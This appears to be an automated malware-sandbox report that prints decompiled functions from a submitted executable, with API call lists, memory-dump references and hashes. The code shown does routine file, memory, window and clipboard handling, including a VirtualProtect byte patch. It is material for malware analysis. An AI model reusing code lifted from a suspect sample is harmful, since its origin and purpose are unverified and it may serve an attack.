                                                                                    • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040581E, Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E0040581E(CHAR* _a4) {
				signed char _t3;

				_t3 = GetFileAttributesA(_a4); // executed
				if(_t3 != 0xffffffff) {
					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t3;
			}




                                                                                    0x00405822
                                                                                    0x0040582b
                                                                                    0x00000000
                                                                                    0x00405834
                                                                                    0x0040583a

                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNELBASE(?,00405629,?,?,?), ref: 00405822
                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405834
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                    • Instruction ID: 89544605ef234ac14ed66c3b065a2d642d1346908a696065e0ba681aeed38476
                                                                                    • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                    • Instruction Fuzzy Hash: F8C04CB1808501ABD7056B24EF0D81F7B66EF50325B108B35F5A9E00F0C7355C66DA1A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 73CA2A38, Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 44%
                                                                                    			E73CA2A38(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				void* _t28;
				void* _t29;
				int _t33;
				void* _t37;
				void* _t40;
				void* _t45;
				void* _t49;
				signed int _t56;
				void* _t61;
				void* _t70;
				intOrPtr _t72;
				signed int _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				void* _t81;
				void* _t87;
				void* _t88;
				void* _t89;
				void* _t90;
				intOrPtr _t93;
				intOrPtr _t94;

				if( *0x73ca4040 != 0 && E73CA297D(_a4) == 0) {
					 *0x73ca4044 = _t93;
					if( *0x73ca403c != 0) {
						_t93 =  *0x73ca403c;
					} else {
						E73CA2F60(E73CA2977(), __ecx);
						 *0x73ca403c = _t93;
					}
				}
				_t28 = E73CA29AB(_a4);
				_t94 = _t93 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E73CA299F();
					_t72 = _a4;
					_t79 =  *0x73ca4048;
					 *((intOrPtr*)(_t29 + _t72)) = _t79;
					 *0x73ca4048 = _t72;
					E73CA2999();
					_t33 = EnumSystemCodePagesW(??, ??); // executed
					 *0x73ca401c = _t33;
					 *0x73ca4020 = _t79;
					if( *0x73ca4040 != 0 && E73CA297D( *0x73ca4048) == 0) {
						 *0x73ca403c = _t94;
						_t94 =  *0x73ca4044;
					}
					_t80 =  *0x73ca4048;
					_a4 = _t80;
					 *0x73ca4048 =  *((intOrPtr*)(E73CA299F() + _t80));
					_t37 = E73CA298B(_t80);
					_pop(_t81);
					if(_t37 != 0) {
						_t40 = E73CA29AB(_t81);
						if(_t40 > 0) {
							_push(_t40);
							_push(E73CA29B6() + _a4 + _v8);
							_push(E73CA29C0());
							if( *0x73ca4040 <= 0 || E73CA297D(_a4) != 0) {
								_pop(_t88);
								_pop(_t45);
								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
								if(__eflags == 0) {
								}
								asm("loop 0xfffffff5");
							} else {
								_pop(_t89);
								_pop(_t49);
								 *0x73ca403c =  *0x73ca403c +  *(_t89 + _t49) * 4;
								asm("loop 0xffffffeb");
							}
						}
					}
					_t107 =  *0x73ca4048;
					if( *0x73ca4048 == 0) {
						 *0x73ca403c = 0;
					}
					E73CA29E4(_t107, _a4,  *0x73ca401c,  *0x73ca4020);
					return _a4;
				}
				_push(E73CA29B6() + _a4);
				_t56 = E73CA29BC();
				_v8 = _t56;
				_t77 = _t28;
				_push(_t68 + _t56 * _t77);
				_t70 = E73CA29C8();
				_t87 = E73CA29C4();
				_t90 = E73CA29C0();
				_t61 = _t77;
				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
					_push( *((intOrPtr*)(_t70 + _t61)));
				}
				_push( *((intOrPtr*)(_t87 + _t61)));
				asm("loop 0xfffffff1");
				goto L9;
			}

























                                                                                    0x73ca2a48
                                                                                    0x73ca2a59
                                                                                    0x73ca2a66
                                                                                    0x73ca2a7a
                                                                                    0x73ca2a68
                                                                                    0x73ca2a6d
                                                                                    0x73ca2a72
                                                                                    0x73ca2a72
                                                                                    0x73ca2a66
                                                                                    0x73ca2a83
                                                                                    0x73ca2a88
                                                                                    0x73ca2a8e
                                                                                    0x73ca2ad2
                                                                                    0x73ca2ad2
                                                                                    0x73ca2ad7
                                                                                    0x73ca2adc
                                                                                    0x73ca2ae2
                                                                                    0x73ca2ae4
                                                                                    0x73ca2aea
                                                                                    0x73ca2af7
                                                                                    0x73ca2af9
                                                                                    0x73ca2afe
                                                                                    0x73ca2b0b
                                                                                    0x73ca2b1e
                                                                                    0x73ca2b24
                                                                                    0x73ca2b2a
                                                                                    0x73ca2b2b
                                                                                    0x73ca2b31
                                                                                    0x73ca2b3d
                                                                                    0x73ca2b43
                                                                                    0x73ca2b4b
                                                                                    0x73ca2b4c
                                                                                    0x73ca2b4f
                                                                                    0x73ca2b5a
                                                                                    0x73ca2b5c
                                                                                    0x73ca2b68
                                                                                    0x73ca2b6e
                                                                                    0x73ca2b76
                                                                                    0x73ca2ba2
                                                                                    0x73ca2ba3
                                                                                    0x73ca2ba5
                                                                                    0x73ca2ba9
                                                                                    0x73ca2ba9
                                                                                    0x73ca2bb0
                                                                                    0x73ca2b86
                                                                                    0x73ca2b86
                                                                                    0x73ca2b87
                                                                                    0x73ca2b95
                                                                                    0x73ca2b9e
                                                                                    0x73ca2b9e
                                                                                    0x73ca2b76
                                                                                    0x73ca2b5a
                                                                                    0x73ca2bb2
                                                                                    0x73ca2bb9
                                                                                    0x73ca2bbb
                                                                                    0x73ca2bbb
                                                                                    0x73ca2bd4
                                                                                    0x73ca2be2
                                                                                    0x73ca2be2
                                                                                    0x73ca2a99
                                                                                    0x73ca2a9a
                                                                                    0x73ca2a9f
                                                                                    0x73ca2aa3
                                                                                    0x73ca2aa8
                                                                                    0x73ca2abc
                                                                                    0x73ca2abd
                                                                                    0x73ca2abe
                                                                                    0x73ca2ac0
                                                                                    0x73ca2ac5
                                                                                    0x73ca2ac7
                                                                                    0x73ca2ac7
                                                                                    0x73ca2aca
                                                                                    0x73ca2ad0
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • EnumSystemCodePagesW.KERNELBASE(00000000), ref: 73CA2AF7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.241754228.0000000073CA1000.00000020.00020000.sdmp, Offset: 73CA0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.241748462.0000000073CA0000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.241762854.0000000073CA3000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.241781372.0000000073CA5000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CodeEnumPagesSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2369445336-0
                                                                                    • Opcode ID: 3503d3270c90469f8169ed254708f317e92627a94afe3d9339dabac5767831be
                                                                                    • Instruction ID: c8ee0df5e772afcedb0b79c85b52afbe9cb59abddc9682033f0d435ecf425cc3
                                                                                    • Opcode Fuzzy Hash: 3503d3270c90469f8169ed254708f317e92627a94afe3d9339dabac5767831be
                                                                                    • Instruction Fuzzy Hash: CB41637350432EDFEB11EFAEE880B5937B5EB44714F254425E50AEF250D7349881BB61
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004031BF, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004031BF(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                    0x004031c3
                                                                                    0x004031d6
                                                                                    0x004031de
                                                                                    0x00000000
                                                                                    0x004031e5
                                                                                    0x00000000
                                                                                    0x004031e7

                                                                                    APIs
                                                                                    • ReadFile.KERNELBASE(00409130,00000000,00000000,00000000,00413040,0040B040,004030C4,00413040,00004000,?,00000000,?,00402F4E,00000004,00000000,00000000), ref: 004031D6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    • Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                    • Instruction ID: 4c5c04567c480c11bae84e94003d2882b37cb3083c3cc1db03504fe221b835f3
                                                                                    • Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                    • Instruction Fuzzy Hash: DAE08631500119BBCF215E619C00A973B5CEB09362F008033FA04E9190D532DB109BA5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 73CA2921, Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			_entry_(intOrPtr _a4, intOrPtr _a8) {

				 *0x73ca4038 = _a4;
				if(_a8 == 1) {
					VirtualProtect(0x73ca404c, 4, 0x40, 0x73ca403c); // executed
					 *0x73ca404c = 0xc2;
					 *0x73ca403c = 0;
					 *0x73ca4044 = 0;
					 *0x73ca4058 = 0;
					 *0x73ca4048 = 0;
					 *0x73ca4040 = 0;
					 *0x73ca4050 = 0;
					 *0x73ca404e = 0;
				}
				return 1;
			}



                                                                                    0x73ca292a
                                                                                    0x73ca292f
                                                                                    0x73ca293f
                                                                                    0x73ca2947
                                                                                    0x73ca294e
                                                                                    0x73ca2953
                                                                                    0x73ca2958
                                                                                    0x73ca295d
                                                                                    0x73ca2962
                                                                                    0x73ca2967
                                                                                    0x73ca296c
                                                                                    0x73ca296c
                                                                                    0x73ca2974

                                                                                    APIs
                                                                                    • VirtualProtect.KERNELBASE(73CA404C,00000004,00000040,73CA403C), ref: 73CA293F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.241754228.0000000073CA1000.00000020.00020000.sdmp, Offset: 73CA0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.241748462.0000000073CA0000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.241762854.0000000073CA3000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.241781372.0000000073CA5000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-0
                                                                                    • Opcode ID: 04c56d4e33416acde8eb83b2e2d7161487dc8d9c8feafbaee4fa644fbccd72e0
                                                                                    • Instruction ID: 72d77cfaba1189d3dc943d6d5f9b7f70550d4f6eac9da508619501046d2b7485
                                                                                    • Opcode Fuzzy Hash: 04c56d4e33416acde8eb83b2e2d7161487dc8d9c8feafbaee4fa644fbccd72e0
                                                                                    • Instruction Fuzzy Hash: 0AF0A5B35082E1DEC3A0EF7A84847063FE1A318354B22852AE59CDF341E3345844BF11
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004031F1, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004031F1(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                    0x004031ff
                                                                                    0x00403205

                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E9D,?), ref: 004031FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    • Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                    • Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
                                                                                    • Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                    • Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 73CA101B, Relevance: 1.3, APIs: 1, Instructions: 13memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 16%
                                                                                    			E73CA101B(signed int _a4) {
				signed int _t2;
				void* _t4;

				_t2 = E73CA14BB();
				if(_t2 != 0) {
					_t4 = GlobalAlloc(0x40, _t2 * _a4); // executed
					_push(_t4);
				} else {
					_push(_t2);
				}
				return E73CA14E2();
			}





                                                                                    0x73ca101b
                                                                                    0x73ca1022
                                                                                    0x73ca102f
                                                                                    0x73ca1035
                                                                                    0x73ca1024
                                                                                    0x73ca1024
                                                                                    0x73ca1024
                                                                                    0x73ca103c

                                                                                    APIs
                                                                                    • GlobalAlloc.KERNELBASE(00000040,?,73CA1019,00000001), ref: 73CA102F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.241754228.0000000073CA1000.00000020.00020000.sdmp, Offset: 73CA0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.241748462.0000000073CA0000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.241762854.0000000073CA3000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.241781372.0000000073CA5000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AllocGlobal
                                                                                    • String ID:
                                                                                    • API String ID: 3761449716-0
                                                                                    • Opcode ID: 78032726fa3d78f6f5f9fd17e69dadba39deaa39595a8209fcf5356d3a240b8d
                                                                                    • Instruction ID: 17de499e8566f34b634f343e125f09e8367823fffa7459d9447bb0d8a90fb3ad
                                                                                    • Opcode Fuzzy Hash: 78032726fa3d78f6f5f9fd17e69dadba39deaa39595a8209fcf5356d3a240b8d
                                                                                    • Instruction Fuzzy Hash: 4DC04CE2505383BBE71596FE4A45F1A76AC9B48651F228405F786DA0C0DA24C6006635
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00405684, Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E00405684(CHAR* _a4, intOrPtr _a8) {
				CHAR* _t3;
				char _t4;

				_t3 = _a4;
				while(1) {
					_t4 =  *_t3;
					if(_t4 == 0) {
						break;
					}
					if(_t4 != _a8) {
						_t3 = CharNextA(_t3); // executed
						continue;
					}
					break;
				}
				return _t3;
			}





                                                                                    0x00405684
                                                                                    0x00405697
                                                                                    0x00405697
                                                                                    0x0040569b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040568e
                                                                                    0x00405691
                                                                                    0x00000000
                                                                                    0x00405691
                                                                                    0x00000000
                                                                                    0x0040568e
                                                                                    0x0040569d

                                                                                    APIs
                                                                                    • CharNextA.USER32(?,004032E7,"C:\Users\user\Desktop\5SXTKXCnqS.exe" ,00000020), ref: 00405691
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.239137393.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.239121682.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239186619.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239200738.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239305698.0000000000422000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239326419.0000000000429000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.239341604.000000000042C000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CharNext
                                                                                    • String ID:
                                                                                    • API String ID: 3213498283-0
                                                                                    • Opcode ID: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
                                                                                    • Instruction ID: 4b50f4be006ed93e5fecb5877ccbcb73a57f8e59dcdb15c27e94a023760cf747
                                                                                    • Opcode Fuzzy Hash: 10cd4d19b72e12b0d646a530e1cb92258a05f85d45f981c2b986421ba67828a8
                                                                                    • Instruction Fuzzy Hash: A9C0802440C64057C610475045248777FF4EA92340F948CA7F8CC63150C23A68408F3A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 00405042, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 95%
                                                                                    			E00405042(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404FD6, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405B88(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x4204a0;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42366c == _t149) {
							ShowWindow( *0x423ea8, 8);
							if( *0x423f2c == _t149) {
								E00404F04( *((intOrPtr*)( *0x41fc70 + 0x34)), _t149);
							}
							E00403EF1(1);
							goto L25;
						}
						 *0x41f868 = 2;
						E00403EF1(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403F7F(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403F4D(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403F4D( *0x423670);
				 *0x423674 = E004047A6(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403F18(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403F4D( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}
































                                                                                    0x0040504b
                                                                                    0x00405051
                                                                                    0x0040505a
                                                                                    0x0040505d
                                                                                    0x004051f5
                                                                                    0x00405219
                                                                                    0x00405219
                                                                                    0x0040522c
                                                                                    0x0040524a
                                                                                    0x00405251
                                                                                    0x004052a8
                                                                                    0x004052ac
                                                                                    0x00000000
                                                                                    0x004052b3
                                                                                    0x004052bb
                                                                                    0x004052c3
                                                                                    0x004052c6
                                                                                    0x004053bf
                                                                                    0x00000000
                                                                                    0x004053bf
                                                                                    0x004052d5
                                                                                    0x004052e1
                                                                                    0x004052e7
                                                                                    0x004052ed
                                                                                    0x00405302
                                                                                    0x00405308
                                                                                    0x004052ef
                                                                                    0x004052f4
                                                                                    0x004052fa
                                                                                    0x004052fd
                                                                                    0x004052fd
                                                                                    0x00405318
                                                                                    0x00405320
                                                                                    0x00405323
                                                                                    0x0040532c
                                                                                    0x0040532f
                                                                                    0x00405336
                                                                                    0x0040533d
                                                                                    0x00405345
                                                                                    0x00405345
                                                                                    0x0040535c
                                                                                    0x0040535c
                                                                                    0x00405363
                                                                                    0x00405369
                                                                                    0x00405372
                                                                                    0x00405379
                                                                                    0x00405382
                                                                                    0x00405384
                                                                                    0x00405387
                                                                                    0x00405396
                                                                                    0x00405398
                                                                                    0x0040539e
                                                                                    0x0040539f
                                                                                    0x004053a0
                                                                                    0x004053a8
                                                                                    0x004053b3
                                                                                    0x004053b9
                                                                                    0x004053b9
                                                                                    0x00000000
                                                                                    0x00405323
                                                                                    0x004052ac
                                                                                    0x00405259
                                                                                    0x00405289
                                                                                    0x00405291
                                                                                    0x0040529c
                                                                                    0x0040529c
                                                                                    0x004052a3
                                                                                    0x00000000
                                                                                    0x004052a3
                                                                                    0x0040525d
                                                                                    0x00405267
                                                                                    0x00000000
                                                                                    0x0040522e
                                                                                    0x00405234
                                                                                    0x0040526c
                                                                                    0x00000000
                                                                                    0x00405275
                                                                                    0x0040523d
                                                                                    0x00405242
                                                                                    0x00405245
                                                                                    0x00000000
                                                                                    0x00405245
                                                                                    0x0040522c
                                                                                    0x00405063
                                                                                    0x00405067
                                                                                    0x00405070
                                                                                    0x00405077
                                                                                    0x0040507a
                                                                                    0x0040507d
                                                                                    0x00405080
                                                                                    0x00405081
                                                                                    0x00405082
                                                                                    0x0040509b
                                                                                    0x0040509e
                                                                                    0x004050a8
                                                                                    0x004050b7
                                                                                    0x004050bf
                                                                                    0x004050c7
                                                                                    0x004050cc
                                                                                    0x004050cf
                                                                                    0x004050db
                                                                                    0x004050e4
                                                                                    0x004050ed
                                                                                    0x00405110
                                                                                    0x00405116
                                                                                    0x00405127
                                                                                    0x0040512c
                                                                                    0x0040513a
                                                                                    0x00405148
                                                                                    0x00405148
                                                                                    0x0040514d
                                                                                    0x0040515b
                                                                                    0x0040515b
                                                                                    0x00405160
                                                                                    0x00405163
                                                                                    0x00405168
                                                                                    0x00405174
                                                                                    0x0040517d
                                                                                    0x0040518a
                                                                                    0x00405199
                                                                                    0x0040518c
                                                                                    0x00405191
                                                                                    0x00405191
                                                                                    0x004051a5
                                                                                    0x004051a5
                                                                                    0x004051b9
                                                                                    0x004051c2
                                                                                    0x004051cb
                                                                                    0x004051db
                                                                                    0x004051e7
                                                                                    0x004051e7
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • GetDlgItem.USER32 ref: 004050A1
                                                                                    • GetDlgItem.USER32 ref: 004050B0
                                                                                    • GetClientRect.USER32 ref: 004050ED
                                                                                    • GetSystemMetrics.USER32 ref: 004050F5
                                                                                    • SendMessageA.USER32 ref: 00405116
                                                                                    • SendMessageA.USER32 ref: 00405127
                                                                                    • SendMessageA.USER32 ref: 0040513A
                                                                                    • SendMessageA.USER32 ref: 00405148
                                                                                    • SendMessageA.USER32 ref: 0040515B
                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040517D
                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405191
                                                                                    • GetDlgItem.USER32 ref: 004051B2
                                                                                    • SendMessageA.USER32 ref: 004051C2
                                                                                    • SendMessageA.USER32 ref: 004051DB
                                                                                    • SendMessageA.USER32 ref: 004051E7
                                                                                    • GetDlgItem.USER32 ref: 004050BF
                                                                                      • Part of subcall function 00403F4D: SendMessageA.USER32 ref: 00403F5B
                                                                                    • GetDlgItem.USER32 ref: 00405204
                                                                                    • CreateThread.KERNEL32 ref: 00405212
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405219
                                                                                    • ShowWindow.USER32(00000000), ref: 0040523D
                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405242
                                                                                    • ShowWindow.USER32(00000008), ref: 00405289
                                                                                    • SendMessageA.USER32 ref: 004052BB
                                                                                    • CreatePopupMenu.USER32 ref: 004052CC
                                                                                    • AppendMenuA.USER32 ref: 004052E1
                                                                                    • GetWindowRect.USER32 ref: 004052F4
                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405318
                                                                                    • SendMessageA.USER32 ref: 00405353
                                                                                    • OpenClipboard.USER32(00000000), ref: 00405363
                                                                                    • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405369
                                                                                    • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405372
                                                                                    • GlobalLock.KERNEL32 ref: 0040537C
                                                                                    • SendMessageA.USER32 ref: 00405390
                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004053A8
                                                                                    • SetClipboardData.USER32 ref: 004053B3
                                                                                    • CloseClipboard.USER32(?,?,00000000,?,00000000), ref: 004053B9
                                                                                    Strings
                                                                                    Memory Dump Source
